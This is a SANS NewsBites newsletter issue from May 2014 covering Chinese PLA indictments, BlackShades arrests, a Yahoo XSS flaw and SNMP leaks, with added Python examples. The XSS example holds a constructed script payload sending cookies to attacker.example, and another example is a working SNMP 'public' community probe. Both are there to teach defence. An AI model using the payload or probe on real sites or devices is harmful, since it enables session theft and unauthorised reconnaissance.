SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.
Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.
Volume XVI - Issue #40
May 20, 2014
TOP OF THE NEWS
DOJ Indicts Five Chinese Military Members for Alleged Commercial Espionage
China Suspends Cyber Security Cooperation with US
Cisco CEO Tells Obama That NSA Installed Backdoors are Not Good for the Economy
Worldwide Arrests Over BlackShades Malware
THE REST OF THE WEEK'S NEWS
Instant Messaging Services to Require Encryption for Connections
Yahoo Fixes Vulnerability in Comments Sections of Sites
LifeLock Pulls App, Deletes Customer Data Over PCI Compliance Concerns
Critical Flaws in Load Balancer, Modems
Doge Vault Loses US $130,000 to Attackers
Experts Will Review NIST Cryptographic Standard Revision Proposal
FBI Wants to Buy Malware
Chairman of Joint Chiefs of Staff Says Country Not Prepared for Cyber Attack
STORM CENTER TECH CORNER
************************** Sponsored By Lancope *************************
Ponemon Institute Research Report - Cyber Security Incident Response: Are we as prepared as we think? Get your copy - http://www.sans.org/info/159802
***************************************************************************
TRAINING UPDATE
-- SANS Rocky Mountain 2014 Denver, CO June 9-14, 2014 8 courses. Bonus evening presentations include Continuous Ownage; Why You Need Continuous Monitoring; and APT: It is Time to Act.
http://www.sans.org/event/rocky-mountain-2014
--SANSFIRE 2014 Baltimore, MD June 21-30, 2014 42 courses. Bonus evening presentations include Avoiding Cyberterrorism Threats Inside Electrical Substations; Security Awareness Metrics: Measuring Human Behavior; and Penetration Testing Corporate Mobile Applications and BYOD Environments.
http://www.sans.org/event/sansfire-2014
--SANS Capital City 2014 Washington, DC July 7-12, 2014 7 courses. Bonus evening presentations include Weaponizing Digital Currency; Incident Response and Forensics in the Cloud; and Who's Watching the Watchers?
http://www.sans.org/event/capital-city-2014
--SANS Secure Europe 2014 Amsterdam, Netherlands May 10-24, 2014 11 courses.
http://www.sans.org/event/secure-europe-2014
--SANS Pen Test Berlin Berlin, Germany June 15-21, 2014 6 courses. Bonus evening session: Pwn a Drone Hacking Challenge.
http://www.sans.org/event/pentest-berlin-2014
--SANS London Summer 2014 London, UK July 14-21, 2014 5 courses.
http://www.sans.org/event/london-summer-2014
--Can't travel? SANS offers LIVE online instruction. Day (www.sans.org/simulcast) and Evening courses (www.sans.org/vlive) available!
--Multi-week Live SANS training
http://www.sans.org/mentor/about
Contact mentor@sans.org
--Looking for training in your own community?
http://www.sans.org/community/
--Save on On-Demand training (30 full courses) - See samples at
http://www.sans.org/ondemand/specials
Plus Austin, Malaysia, and Bangkok all in the next 90 days.
For a list of all upcoming events, on-line and live: http://www.sans.org
*****************************************************************************
TOP OF THE NEWS
DOJ Indicts Five Chinese Military Members for Alleged Commercial Espionage (May 19, 2014)
The US Department of Justice (DOJ) has charged five members of China's People's Liberation Army with conspiracy to commit computer fraud and abuse. The men allegedly broke into the networks of several major US companies and stole data including cost and pricing information and technical plans. This is the first instance in which the US has brought legal action against foreign government workers regarding cyber crime. The move could spur other countries to make similar legal claims against the US.
-http://www.washingtonpost.com/world/national-security/us-to-announce-first-criminal-charges-against-foreign-country-for-cyberspying/2014/05/19/586c9992-df45-11e3-810f-764fe508b82d_story.html
-http://www.washingtonpost.com/blogs/the-switch/wp/2014/05/19/everything-you-need-to-know-about-the-alleged-chinese-military-hacker-squad-the-u-s-just-indicted/
-http://www.bbc.com/news/world-us-canada-27475324
-http://www.nextgov.com/cybersecurity/2014/05/us-files-criminal-charges-against-chinese-military-officials-hacking-american-companies/84691/?oref=ng-relatedstories
-http://www.theregister.co.uk/2014/05/19/us_authorities_name_five_chinese_military_hackers_wanted_for_espionage/
-http://www.wired.com/2014/05/us-indictments-of-chinese-military-hackers-could-be-awkward-for-nsa/
[Editor's Note (Henry): This is a big step, IMHO. The USG has known about this for years, has attempted diplomatic discussions, yet the activities continue. It is largely symbolic...the PRC is not going to extradite its military officers...yet it says "this is no longer acceptable behavior." How many days in a row do you get your lunch money stolen before someone does something about it? Yes, defense in depth is important...it's CRITICAL. Regardless, the defense of networks must be multi-lateral, and changing the behavior of those conducting this activity is necessary to manage the threat. While not a silver bullet, this action by the US government adds a new dimension to the status quo.
(Pescatore): There is an old saying: "People who throw stones from within their glass house will get wet the next time it rains."
(Assante): Much of the world fails to draw a distinction between espionage for the purposes of foreign intelligence gathering and economic competitiveness. Chinese leaders will probably not interpret the intended consequences of this legal action as a negative reflection on their conduct in a global market place. This action is an effort to achieve the 'collective goal' of raising an attacker's cost - especially in time, resources, and risk - so the costs exceed their perceived benefit.]
China Suspends Cyber Security Cooperation with US (May 19, 2014)
China has suspended cooperative cyber security efforts with the US in the wake of the indictment of five Chinese military officials on espionage-related charges. Calling the charges "deliberately fabricated," Chinese officials have also said that the US may face retaliation. China and the US agreed to the Cyber Working Group initiative just last month. Chinese officials also say that the US "has been conducting cyber intrusion, wiretapping, and surveillance against Chinese government departments, institutions, companies, universities, and individuals."
-http://www.businessweek.com/news/2014-05-19/china-suspends-cybersecurity-cooperation-with-u-dot-s-dot-after-charges
-http://www.nbcnews.com/news/world/china-suspends-cybersecurity-cooperation-after-us-charges-n109476
[Editor's Note (Pescatore): It is official: we can now call this era the "Cyber Cold War." ]
Cisco CEO Tells Obama That NSA-Installed Backdoors are Not Good for the Economy (May 19, 2014)
Cisco CEO John Chambers has written to President Obama, saying that reports of the NSA adding surveillance technology to networking devices in transit could damage customer confidence in US products, and with it the US economy. Chambers asked President Obama to establish rules governing how the NSA operates to ensure the agency does not threaten the integrity of US companies' products.
-http://arstechnica.com/information-technology/2014/05/cisco-ceo-to-obama-dont-let-nsa-intercept-and-hack-our-gear/
-http://www.bbc.com/news/technology-27468794
-http://www.computerworld.com/s/article/9248420/Cisco_CEO_tells_Obama_that_NSA_spying_hits_tech_sales?taxonomyId=17
-http://www.cnet.com/news/cisco-ceo-asks-obama-to-control-nsa-surveillance/
-http://www.theregister.co.uk/2014/05/19/ciscos_chambers_to_obama_stop_fiddling_our_routers/
[Editor's Note (Pescatore): This Cyber Cold War era is very complicated. The US is charging the Chinese with cyber attacks that damage our economy, while the CEO of a US vendor is making the same charges against the US. Meanwhile, Huawei has funded the Cyber Security Evaluation Centre in the UK where the UK tests Huawei gear to make sure there are no backdoors installed, and Chinese DDoS mitigation vendor NSFocus pays US application security test company Veracode to do the same for their products. It is hard to tell who the good guys are in this war, but the US is definitely not leading on the transparency front.
(Shpantzer): Obligatory damage control to distance the American corporation from the American intelligence agency. What can be done to prevent the French/Israeli/Chinese/etc. intelligence agencies from opening a box and sticking some extra goodies into a piece of hardware in their own country, or someone else's, for that matter? MAYBE some sort of tamper-evident seal, but what about Customs and other good excuses? ]
Worldwide Arrests Over BlackShades Malware (May 19, 2014)
Nearly 100 people have been arrested worldwide in connection with a sweep targeting buyers, sellers, and users of a remote access Trojan (RAT) known as BlackShades. BlackShades can log keystrokes, give attackers access to documents, pictures, and other files on infected machines, and turn on webcams. BlackShades has infected between 500,000 and 700,000 machines.
-http://arstechnica.com/security/2014/05/more-than-100-arrested-in-global-crackdown-on-peeping-tom-malware/
-http://www.nbcnews.com/tech/security/creepware-hacker-sting-nets-97-worldwide-n109061
-http://www.computerworld.com/s/article/9248431/BlackShades_users_targeted_in_16_nation_sweep_97_arrested?taxonomyId=17
-http://krebsonsecurity.com/2014/05/blackshades-trojan-users-had-it-coming/
[Editor's Note (Ullrich): The interesting part here is that after arresting the creators of the exploit kit, law enforcement used the data collected from the creator to go after customers who purchased the malware. The international collaboration in this case is impressive.
(Murray): Preferred the Krebs report. What is significant is that this "crackdown" was on the trade. It has created a great deal of angst in this illicit, but fairly public, market. However, this product competed on price and appealed to the least sophisticated buyers. One hopes that the "Zeus market" gains the same attention.
(Honan): Well done to all involved and in particular Europol's CyberCrime Centre (EC3) which coordinated this activity. ]
************************** Sponsored Links: ******************************
1) Do you know how to protect your organization? Download the free eBook: Endpoint Threat Detection for Dummies! http://www.sans.org/info/159807
2) Webcast: Securing Web Applications: Identifying and Managing Risks with Programming Languages and Frameworks with Johannes Ullrich and Jeremiah Grossman. Wednesday, May 21 at 1:00 PM EDT. http://www.sans.org/info/159812
3) Webcast: Best Practices for Leveraging Security Threat Intelligence. Wednesday, June 04 at 1:00 PM EDT - with Russell Spitler & Dave Shackleford. http://www.sans.org/info/159817
*****************************************************************************
THE REST OF THE WEEK'S NEWS
Instant Messaging Services to Require Encryption for Connections (May 20, 2014)
Operators of instant messaging services built on the Extensible Messaging and Presence Protocol (XMPP, also known as Jabber) have begun requiring TLS encryption for client-to-server and server-to-server connections; unencrypted connections are refused. The new policy grew out of a 2012 pledge by XMPP developers and operators to test and then mandate encryption on the XMPP network, to protect the communications from eavesdroppers.
-http://www.theregister.co.uk/2014/05/20/im_upgrade_locks_out_lazy_eavesdroppers/
[Editor's Note (Pescatore): I'm not sure this really makes any meaningful change in anyone's real-world risk equation. For most businesses that allow outbound IM from their desktops, the loss in visibility into IM traffic brings some increase in risk, while there haven't been many documented instances of business impact due to IM eavesdropping. But, in general, making transport encryption the default for all communications over the Internet should be the norm. ]
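What "requiring encryption" looks like on the wire: after a client opens an XMPP stream on port 5222, the server answers with a <stream:features> element, and a server that mandates TLS advertises <starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls> there and drops sessions that do not negotiate it. The code below is an added example written for this issue, not code from the newsletter or from any XMPP project; the three feature stanzas are constructed locally, not captured from a real server, and the two decision functions are a simplified model of what a client and a server do at that point in the handshake.

```python
"""Read the STARTTLS advertisement out of an XMPP <stream:features> stanza."""
import xml.etree.ElementTree as ET

STREAM_NS = "http://etherx.jabber.org/streams"
TLS_NS = "urn:ietf:params:xml:ns:xmpp-tls"


def starttls_policy(features_xml: str) -> str:
    """Return 'required', 'optional' or 'none' for the server's STARTTLS offer."""
    root = ET.fromstring(features_xml)
    if root.tag != "{%s}features" % STREAM_NS:
        raise ValueError("not a <stream:features> element")
    starttls = root.find("{%s}starttls" % TLS_NS)
    if starttls is None:
        return "none"
    if starttls.find("{%s}required" % TLS_NS) is not None:
        return "required"
    return "optional"


def client_should_continue(features_xml: str, allow_plaintext: bool = False) -> bool:
    """Client side: keep talking only if the server offers TLS (or plaintext is tolerated).

    When TLS is offered at all, the client's next stanza must be <starttls/>;
    a client that would rather fail than leak refuses a server offering none.
    """
    if starttls_policy(features_xml) == "none":
        return allow_plaintext
    return True


def server_should_continue(policy: str, client_negotiated_tls: bool) -> bool:
    """Server side: with policy 'required', refuse any stanza sent before TLS is up."""
    if policy == "required" and not client_negotiated_tls:
        return False
    return True


# Constructed sample stanzas (assumption: typical shapes, not captured traffic).
FEATURES_TLS_REQUIRED = (
    "<stream:features xmlns:stream='http://etherx.jabber.org/streams'>"
    "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls>"
    "</stream:features>"
)
FEATURES_TLS_OPTIONAL = (
    "<stream:features xmlns:stream='http://etherx.jabber.org/streams'>"
    "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
    "<mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'>"
    "<mechanism>PLAIN</mechanism></mechanisms>"
    "</stream:features>"
)
FEATURES_NO_TLS = (
    "<stream:features xmlns:stream='http://etherx.jabber.org/streams'>"
    "<mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'>"
    "<mechanism>PLAIN</mechanism></mechanisms>"
    "</stream:features>"
)

if __name__ == "__main__":
    for name, stanza in [("required", FEATURES_TLS_REQUIRED),
                         ("optional", FEATURES_TLS_OPTIONAL),
                         ("none", FEATURES_NO_TLS)]:
        print(name, "->", starttls_policy(stanza),
              "client continues:", client_should_continue(stanza))
```

To check your own server, open a TCP connection to port 5222, send the stream header, and feed the <stream:features> reply to starttls_policy(); the FEATURES_NO_TLS shape (SASL PLAIN offered with no STARTTLS at all) is the configuration the new policy locks out.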
Yahoo Fixes Vulnerability in Comments Sections of Sites (May 19, 2014)
A cross-site scripting (XSS) flaw in the comments sections of most Yahoo sites has been fixed. Because comment text was not properly neutralized before being rendered, an attacker could have posted a comment containing script that ran in other readers' browsers and stole information such as session tokens and cookies.
-http://www.scmagazine.com/most-yahoo-sites-impacted-by-xss-flaw-in-comments-section/article/347606/
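The bug class in that item, shown as the vulnerable rendering beside the fixed one. This is an added example for this issue, not Yahoo's code: the comment text, page template and cookie header are hypothetical, and the attacker comment is constructed here to show the mechanism. Two things stop cookie theft through a comment box: escaping user-supplied text at output time so the browser treats it as text, and marking the session cookie HttpOnly so script cannot read it even if some other injection slips through.

```python
"""Stored XSS in a comments section: unsafe rendering, the fix, and the cookie flag."""
from html import escape

# Constructed attacker comment: a script that ships document.cookie off-site.
MALICIOUS_COMMENT = (
    "nice article <script>new Image().src="
    "'https://attacker.example/c?'+document.cookie</script>"
)
# Ordinary text that happens to contain HTML-significant characters.
HARMLESS_COMMENT = "I think 2 < 3 & you're right"

# Hypothetical page template; {body} is where the comment list is dropped in.
PAGE = "<div class='comments'>{body}</div>"


def render_comment_unsafe(comment: str) -> str:
    """The bug: raw comment text is interpolated, so a browser runs the <script>."""
    return PAGE.format(body="<p>%s</p>" % comment)


def render_comment_safe(comment: str) -> str:
    """The fix: <, >, &, and quotes become entities, so the same bytes display as text."""
    return PAGE.format(body="<p>%s</p>" % escape(comment, quote=True))


def contains_live_script(html: str) -> bool:
    """Crude detector used only to contrast the two renderers: any unescaped <script?"""
    return "<script" in html.lower()


def session_cookie_header(token: str) -> str:
    """Set-Cookie for the session id.

    HttpOnly keeps document.cookie from reading it (so the payload above gets
    nothing even where escaping is missed); Secure keeps it off plaintext HTTP.
    """
    return "Set-Cookie: sid=%s; Path=/; HttpOnly; Secure" % token


if __name__ == "__main__":
    print("unsafe:", render_comment_unsafe(MALICIOUS_COMMENT))
    print("safe:  ", render_comment_safe(MALICIOUS_COMMENT))
    print(session_cookie_header("0123456789abcdef"))
```

Escaping belongs at the output boundary (the template), not at submission time, because the same stored comment may be emitted into HTML, an attribute, JSON and e-mail, each of which needs its own encoding; the HttpOnly flag is the defence in depth for the day a template forgets.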
LifeLock Pulls App, Deletes Customer Data Over PCI Compliance Concerns (May 19, 2014)
LifeLock has shut down its Wallet App and deleted all related customer data held on its servers over concerns that the app did not comply with the Payment Card Industry Data Security Standard (PCI DSS). LifeLock CEO Todd Davis said the decision was made proactively, not in response to a breach.
-http://www.theregister.co.uk/2014/05/19/lifelock_yanks_mobile_app/
-http://arstechnica.com/tech-policy/2014/05/id-theft-protector-lifelock-deletes-user-data-over-concerns-that-app-isnt-safe/
-http://www.zdnet.com/lifelock-deletes-data-on-4m-users-in-face-of-potential-pci-violations-7000029628/
[Editor's Note (Shpantzer): Plan for security, then check for security, then deploy financial app. In that order, preferably.]
Critical Flaws in Load Balancer, Modems (May 16, 2014)
Sensitive configuration data, including passwords, can be read from a load balancer and several cable modems over the Simple Network Management Protocol (SNMP) using the default "public" community string: the devices expose the information in their Management Information Base (MIB), so anyone who can reach the SNMP port can retrieve it. The flaws affect a Brocade application load balancer and certain Ambit, Ubee, and Netopia cable modems.
-http://www.scmagazine.com/critical-info-on-modems-load-balancer-exposed-via-snmp-community-string/article/347393/
[Editor's Note (Ullrich): It isn't great that these devices include critical information like passwords in their MIB. But the real problem here is that SNMP is exposed to the Internet and the community string wasn't changed. ]
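The check implied by that note: does a device answer an SNMPv1 read from the outside with the default community "public"? The code below is an added example for this issue, not the newsletter's or any vendor's code. It builds the GetRequest by hand (plain BER, no third-party SNMP library), decodes the GetResponse, and probes sysDescr.0; the sample response is constructed locally, not captured from a real device, and the host name in the usage line is a placeholder.

```python
"""Minimal SNMPv1 GET with a chosen community string, standard library only."""
import socket

GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2
SYS_DESCR_0 = "1.3.6.1.2.1.1.1.0"   # standard probe OID: system description


def ber_len(n: int) -> bytes:
    """BER length: one byte below 128, else 0x8N followed by N length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(value)) + value


def encode_int(v: int) -> bytes:
    """INTEGER, minimal two's-complement body."""
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def encode_oid(oid: str) -> bytes:
    """OBJECT IDENTIFIER: first two arcs fused, the rest base-128 with continuation bits."""
    arcs = [int(a) for a in oid.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(chunk)
    return tlv(0x06, bytes(out))


def build_pdu(pdu_tag: int, community: str, oid: str, request_id: int,
              value: bytes = b"\x05\x00") -> bytes:
    """SNMPv1 message: version 0, community, then PDU{req-id, err, err-idx, varbinds}."""
    varbind = tlv(0x30, encode_oid(oid) + value)           # value defaults to NULL
    pdu = tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0)
              + tlv(0x30, varbind))
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)


def build_get(community: str, oid: str, request_id: int = 1) -> bytes:
    return build_pdu(GET_REQUEST, community, oid, request_id)


def read_tlv(buf: bytes, off: int):
    """Return (tag, value_bytes, offset_after) for the TLV starting at off."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, buf[off:off + length], off + length


def decode_oid(data: bytes) -> str:
    arcs, val = [data[0] // 40, data[0] % 40], 0
    for b in data[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def parse_response(msg: bytes):
    """(community, oid, value_bytes) from a GetResponse; None if msg is not one."""
    tag, body, _ = read_tlv(msg, 0)
    if tag != 0x30:
        return None
    _, _, off = read_tlv(body, 0)                    # version
    _, community, off = read_tlv(body, off)
    pdu_tag, pdu, _ = read_tlv(body, off)
    if pdu_tag != GET_RESPONSE:
        return None
    _, _, off = read_tlv(pdu, 0)                     # request-id
    _, _, off = read_tlv(pdu, off)                   # error-status
    _, _, off = read_tlv(pdu, off)                   # error-index
    _, vblist, _ = read_tlv(pdu, off)
    _, vb, _ = read_tlv(vblist, 0)
    _, oid_bytes, off = read_tlv(vb, 0)
    _, value, _ = read_tlv(vb, off)
    return community.decode(), decode_oid(oid_bytes), value


def constructed_response(community: str = "public", text: bytes = b"Cable Modem") -> bytes:
    """A GetResponse shaped as a device would send it (constructed here, not captured)."""
    return build_pdu(GET_RESPONSE, community, SYS_DESCR_0, 1, tlv(0x04, text))


def probe(host: str, community: str = "public", timeout: float = 2.0):
    """Send one GET to UDP/161; the sysDescr text if the device answers, else None."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_get(community, SYS_DESCR_0), (host, 161))
        data, _ = sock.recvfrom(4096)
    except socket.timeout:
        return None
    finally:
        sock.close()
    parsed = parse_response(data)
    return parsed[2].decode(errors="replace") if parsed else None


if __name__ == "__main__":
    print(build_get("public", SYS_DESCR_0).hex())
    print(parse_response(constructed_response()))
    # print(probe("modem.example.invalid"))   # placeholder host; run from outside your perimeter
```

Any answer at all from the Internet side means the device is readable by everyone who guesses "public" (the community string travels in cleartext, so it is also readable by anyone on the path). The fixes, in order of value: filter UDP/161 at the edge, change the community to something unguessable or move to SNMPv3 with authentication, and only then worry about what the vendor put in the MIB.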
Doge Vault Loses US $130,000 to Attackers (May 16 & 19, 2014)
Online wallet Doge Vault says attackers "gained access to the node on which Doge Vault's virtual machines were stored" and stole 70 percent of the assets held, roughly US $130,000. Doge Vault also said that the attackers probably accessed its user account database, noting that passwords were stored using "a strong one-way hashing algorithm." The attackers targeted Doge Vault's "hot wallet," the online-accessible store that lets users withdraw cryptocurrency quickly.
-http://www.zdnet.com/doge-vault-hack-exposes-user-passwords-wallet-data-7000029599/
-http://www.computerworld.com/s/article/9248393/Hackers_hit_DogeVault_virtual_machines?taxonomyId=17
-http://www.theregister.co.uk/2014/05/16/dogecoin_off_the_leash_after_doge_vault_admits_server_attack/
Experts Will Review NIST Cryptographic Standard Revision Proposal (May 14 & 16, 2014)
A panel of experts will conduct an independent assessment of the National Institute of Standards and Technology's (NIST's) proposal for how it develops cryptographic standards and guidelines. After it was revealed that the NSA had influenced the development of NIST cryptographic standards, NIST released a draft report (in February 2014) describing proposed changes to its development process. A seven-member Committee of Visitors will examine the report. The Federal Information Security Management Act (FISMA) requires that NIST work with the NSA on cyber security guidance; federal civilian agencies are required to adopt this guidance. Among the comments submitted since the draft's release in February was the suggestion that NIST needs to be more transparent about its relationship with the NSA. Another commenter noted that because the standards are used around the world, NIST should not "prioritize US interests or discount international perspectives."
-http://www.govinfosecurity.com/experts-to-assess-nist-cryptography-program-a-6846
-http://www.nist.gov/director/vcat/vcat-051414.cfm
[Editor's Note (Pescatore): The open process that NIST led in 2001 that resulted in the Advanced Encryption Standard replacing DES was a watershed breakthrough in the right way to make the online world more secure. This Committee of Visitors has many very respected names on it (though it would have been nice to have been a bit more international) and I hope their recommendations are acted upon. ]
FBI Wants to Buy Malware (May 15, 2014)
According to a solicitation notice, the FBI is seeking a contractor to provide the agency with 30 to 40 gigabytes a day of malware - both new malware and variants of old malware. The FBI wants the malware to further its "mission to obtain global awareness of malware threat."
-http://www.scmagazine.com/fbi-begins-shopping-around-for-malware/article/347292/
-http://www.nextgov.com/cybersecurity/2014/05/why-fbi-wants-procure-malware/84505/?oref=ng-channelriver
Chairman of Joint Chiefs of Staff Says Country Not Prepared for Cyber Attack (May 14, 2014)
Speaking at a conference last week, Chairman of the Joint Chiefs of Staff General Martin Dempsey said that the US does not have a coherent cyber strategy, and that the country is not prepared for a cyber attack. Dempsey says he understands that concerns about cost, privacy, and information sharing contribute to the lack of a strategy. He is concerned not only about distributed denial-of-service (DDoS) attacks and data destruction, but also about data corruption, which "causes you to lose confidence in your systems." Arati Prabhakar, who directs the Defense Advanced Research Projects Agency (DARPA), reiterated concern about data integrity, noting that "unless we have done something to avoid it, ... our embedded military systems ... can be compromised."
-http://fedscoop.com/joint-chiefs-chairman-voices-concerns-nations-cybersecurity-posture/
[Editor's Note (Assante): "In search of trust" - that challenge should worry critical infrastructure operators. Losing confidence in your safe interactions with a web e-commerce page is one thing. Losing confidence in the systems holding back hazardous chemicals or performing life-preserving or life-threatening functions is another matter altogether. One of the hardest questions I had to face was from my former chairman, who asked at what level of confidence we would regain integrity of our operational systems after a compromise. He asked a very important question with far-reaching implications.
(Shpantzer): Let's not discount data destruction attacks just yet. Saudi Arabia and South Korea destructive attacks. Wiping hard drives en masse is no joke, as the admins of the SCCM server at Emory University learned the hard way last week...
-http://webcache.googleusercontent.com/search?q=cache:EF2iQlmDhB8J:it.emory.edu/windows7-incident/+&cd=1&hl=en&ct=clnk&gl=us
(Murray): To Gal Shpantzer's point, one important step would be to restrict "write" access and isolate our "backups" from the systems and networks they protect. ]
STORM CENTER TECH CORNER
iTunes Update
-http://support.apple.com/kb/TS5434
Powershell Tricks
-https://isc.sans.edu/forums/diary/Punking+Pet+Peeves+with+PowerShell/18133
Fake Kaspersky Products
-http://usa.kaspersky.com/about-us/press-center/press-releases/attack-clones-fake-kaspersky-lab-anti-virus-apps-invade-two-mob
D-Link Smart Plug Buffer Overflow
-http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/
-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10027
FBI Cyber Most Wanted
-http://www.fbi.gov/wanted/cyber
Bitcoin Blockchain False Positive With MSFT Security Essentials
-https://answers.microsoft.com/en-us/protect/forum/mse-protect_updating/microsoft-security-essentials-reporting-false/0240ed8e-5a27-4843-a939-0279c8110e1c?tm=1400189799602
iOS 7.1.1 jailbreak
-http://www.reddit.com/r/jailbreak/comments/25z0oj/the_people_who_have_the_711_jailbreak_information/
***********************************************************************
The Editorial Board of SANS NewsBites
John Pescatore was Vice President at Gartner Inc. for fourteen years. He became a director of the SANS Institute in 2013. He has worked in computer and network security since 1978 including time at the NSA and the U.S. Secret Service.
Shawn Henry recently retired as FBI Executive Assistant Director responsible for all criminal and cyber programs and investigations worldwide, as well as international operations and the FBI's critical incident response. He is now president of CrowdStrike Services.
Stephen Northcutt teaches advanced courses in cyber security management; he founded the GIAC certification and was the founding President of STI, the premier skills-based cyber security graduate school, www.sans.edu.
Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.
Ed Skoudis is co-founder of CounterHack, the nation's top producer of cyber ranges, simulations, and competitive challenges, now used from high schools to the Air Force. He is also author and lead instructor of the SANS Hacker Exploits and Incident Handling course, and Penetration Testing course.
Michael Assante was Vice President and Chief Security Officer at NERC, led a key control systems group at Idaho National Labs, and was American Electric Power's CSO. He now leads the global cyber skills development program at SANS for power, oil & gas and other critical infrastructure industries.
Mark Weatherford is a Principal at The Chertoff Group and the former Deputy Under Secretary of Cybersecurity at the US Department of Homeland Security.
William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.
Sean McBride is Director of Analysis and co-founder of Critical Intelligence, and, while at Idaho National Laboratory, he initiated the situational awareness effort that became the ICS-CERT.
Rob Lee is the SANS Institute's top forensics instructor and director of the digital forensics and incident response research and education program at SANS (computer-forensics.sans.org).
Tom Liston is a Senior Security Consultant and Malware Analyst for InGuardians, a handler for the SANS Institute's Internet Storm Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.
Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He leads SANS' efforts to raise the bar in cybersecurity education around the world.
David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.
Gal Shpantzer is a trusted advisor to CSOs of large corporations, technology startups, Ivy League universities and non-profits specializing in critical infrastructure protection. Gal created the Security Outliers project in 2009, focusing on the role of culture in risk management outcomes and contributes to the Infosec Burnout project.
Alan Paller is director of research at the SANS Institute.
Brian Honan is an independent security consultant based in Dublin, Ireland.
David Turley is SANS operations manager and serves as production manager and final editor on SANS NewsBites.
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit http://portal.sans.org/